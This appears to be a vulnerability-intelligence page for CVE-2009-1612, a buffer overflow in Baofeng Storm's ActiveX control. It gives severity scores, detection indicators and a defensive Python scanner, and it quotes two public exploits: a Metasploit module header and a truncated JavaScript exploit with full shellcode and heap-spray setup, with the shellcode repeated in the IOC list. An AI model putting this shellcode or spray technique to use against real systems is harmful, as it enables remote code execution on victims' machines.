CVE-2009-1612
Published 2009-05-11
CVE-2009-1612: Stack-based buffer overflow in the MPS.StormPlayer.1 ActiveX control in mps.dll 3.9.4.27 in Baofeng Storm allows remote attackers to execute arbitrary code via…
Priority: P2 (66, critical) · CVSS 2.0 base score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW: exploited (VulnCheck KEV)
Exploited in the wild
EPSS: 33.26% (98.2 percentile)
Stack-based buffer overflow in the MPS.StormPlayer.1 ActiveX control in mps.dll 3.9.4.27 in Baofeng Storm allows remote attackers to execute arbitrary code via a long argument to the OnBeforeVideoDownload method, as exploited in the wild in April and May 2009. NOTE: some of these details are obtained from third party information. NOTE: it was later reported that 3.09.04.17 and earlier are also affected.
Affected
8 ranges, all listed as baofeng storm with no version bounds given
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| baofeng | storm | — | — |
Detection & IOCs (extracted from sources)
bytes (shellcode from the public exploit): %uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063
- Detect instantiation of the vulnerable ActiveX control by its ProgID 'MPS.StormPlayer.1' or CLSID '6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB' in HTML/JavaScript; this is the attack vector for the exploit.
- Monitor for overly long string arguments passed to the 'OnBeforeVideoDownload' method of the MPS.StormPlayer.1 ActiveX control; the oversized argument triggers the stack-based buffer overflow.
- The exploit uses a heap spray targeting address 0x0c0c0c0c with a 0x40000-byte spray block; detect this characteristic heap spray pattern in browser memory or JavaScript.
- Look for the NOP sled pattern '%u9090%u9090' used as heap spray padding in JavaScript exploiting this vulnerability.
- The public exploit payload launches 'calc.exe' (the shellcode ends with %u63E7%u6C61%u0063) as a proof of concept; in-the-wild variants substitute malicious shellcode in the same unescape() string.
- Affected versions include mps.dll 3.9.4.27 and lower, as well as 3.09.04.17 and earlier per later reports; the Metasploit module targets Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 and IE 7, but notes these targets are untested.
- The Metasploit module's return address ('Ret') field is empty for the sole target, indicating the return gadget was not populated and the module may require additional configuration to be fully functional.
- The exploit was observed in the wild in April and May 2009; later reporting extended the affected version range beyond the initially disclosed 3.9.4.27.
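The detection bullets above translate directly into static indicators that can be checked in proxy-captured or sandboxed HTML/JavaScript. The following scanner is an added example written for this page, not a rule shipped by any of the sources it cites: it looks for the control's CLSID/ProgID, a string literal longer than an assumed threshold passed to OnBeforeVideoDownload, the %u9090%u9090 padding, and the 0x0c0c0c0c / 0x40000 spray constants, then combines them into a severity. The two sample documents, the 256-character threshold and the rule names are constructed assumptions for illustration.

```python
import re

# Indicators listed in this page's Detection & IOCs section.
STORM_CLSID = "6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB"
STORM_PROGID = "MPS.StormPlayer.1"
VULN_METHOD = "OnBeforeVideoDownload"

# Assumed cut-off for "overly long": the advisory gives no exact length,
# so this is a working assumption, not a figure from the sources.
LONG_ARG_THRESHOLD = 256

# Control instantiated by CLSID (object tag) or ProgID (ActiveXObject).
CONTROL_RE = re.compile(
    r"clsid:\s*" + re.escape(STORM_CLSID) + r"|" + re.escape(STORM_PROGID), re.I)
# Any call to the vulnerable method, and the narrower case of a direct string literal.
METHOD_ANY_RE = re.compile(VULN_METHOD + r"\s*\(")
METHOD_LITERAL_RE = re.compile(VULN_METHOD + r"\s*\(\s*([\"'])(.*?)\1\s*\)", re.S)
# Heap spray indicators named on the page.
SPRAY_PAD_RE = re.compile(r"unescape\s*\(\s*[\"']%u9090%u9090[\"']", re.I)
SPRAY_CONST_RE = re.compile(r"0x0c0c0c0c|0x40000\b", re.I)
# A long run of %uXXXX escapes inside one unescape() call (shellcode-like blob).
UNESCAPE_BLOB_RE = re.compile(r"unescape\s*\(\s*[\"'](?:%u[0-9a-f]{4}){8,}", re.I)


def scan_document(text):
    """Return a list of (rule, detail) findings for one HTML/JS document."""
    findings = []
    if CONTROL_RE.search(text):
        findings.append(("storm-activex-instantiated",
                         "CLSID or ProgID of MPS.StormPlayer.1 present"))
    for call in METHOD_ANY_RE.finditer(text):
        literal = METHOD_LITERAL_RE.match(text, call.start())
        if literal is None:
            # Argument is built at runtime; length cannot be judged statically.
            findings.append(("onbeforevideodownload-nonliteral-arg",
                             "argument is an expression, length unknown"))
        elif len(literal.group(2)) > LONG_ARG_THRESHOLD:
            findings.append(("long-onbeforevideodownload-arg",
                             f"literal argument of {len(literal.group(2))} chars"))
    if SPRAY_PAD_RE.search(text):
        findings.append(("heap-spray-nop-pad", "%u9090%u9090 unescape padding"))
    if SPRAY_CONST_RE.search(text):
        findings.append(("heap-spray-constants", "0x0c0c0c0c target or 0x40000 block size"))
    if UNESCAPE_BLOB_RE.search(text):
        findings.append(("long-unescape-blob", "8+ %uXXXX escapes in one unescape()"))
    return findings


EXPLOIT_LIKE = {"long-onbeforevideodownload-arg", "heap-spray-nop-pad",
                "heap-spray-constants", "long-unescape-blob"}


def severity(findings):
    """Instantiation plus any exploit-shaped indicator is high; one alone is medium."""
    rules = {rule for rule, _ in findings}
    instantiated = "storm-activex-instantiated" in rules
    exploit_like = bool(rules & EXPLOIT_LIKE)
    if instantiated and exploit_like:
        return "high"
    if instantiated or exploit_like:
        return "medium"
    return "none"


# Constructed sample pages (not real captures). The first carries the
# indicators from the page's IOC list; the second uses the control normally.
SUSPICIOUS_HTML = (
    '<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="player"></object>\n'
    '<script>\n'
    'var pad = unescape("%u9090%u9090");\n'
    'var addr = 0x0c0c0c0c;\n'
    'player.OnBeforeVideoDownload("' + "A" * 2000 + '");\n'
    '</script>\n'
)
BENIGN_HTML = (
    '<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="player"></object>\n'
    '<script>player.OnBeforeVideoDownload("http://example.invalid/clip.mp4");</script>\n'
)

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        hits = scan_document(doc)
        print(name, severity(hits), [rule for rule, _ in hits])
```

The benign page still scores medium because the control is instantiated at all; on a fleet where Baofeng Storm is not expected, that alone is worth an alert, and on one where it is, the high tier (instantiation combined with spray or long-argument indicators) is the actionable signal.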
CVSS provenance
- NVD (v2.0): 9.3 CRITICAL, AV:N/AC:M/Au:N/C:C/I:C/A:C
- VulnCheck: 9.3 CRITICAL
GHSA
GHSA-2fq7-v233-xx5v: Stack-based buffer overflow in the MPS
ghsa_unreviewed · 2022-05-02 · CVE-2009-1612 · severity HIGH · CWE-119
Description: identical to the CVE description above.
VulnCheck
CVE-2009-1612 [CRITICAL] baofeng storm: Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck · 2009 · CVSS 9.3
Description: identical to the CVE description above.
Affected: baofeng storm
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2009-1612; https://www.cve.org/CVERecord?id=CVE-2009-1612
No detection rules found.
Exploit-DB
CVE-2009-1612 BaoFeng Storm - 'mps.dll' ActiveX OnBeforeVideoDownload Buffer Overflow (Metasploit)
exploitdb · 2010-04-30
---
##
# $Id: baofeng_storm_onbeforevideodownload.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX
control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing
an overly long string to the method "OnBeforeVideoDownload" an attacker
Exploit-DB
CVE-2009-1612 BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow
exploitdb · 2009-04-30
---
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL : mps.dll
# Problem Func : OnBeforeVideoDownload()
function test()
{
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (
Metasploit
BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing an overly long string to the method "OnBeforeVideoDownload" an attacker can execute arbitrary code.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/34944
- http://www.cisrt.org/enblog/read.php?245
- http://www.securityfocus.com/bid/34789
- https://www.exploit-db.com/exploits/8579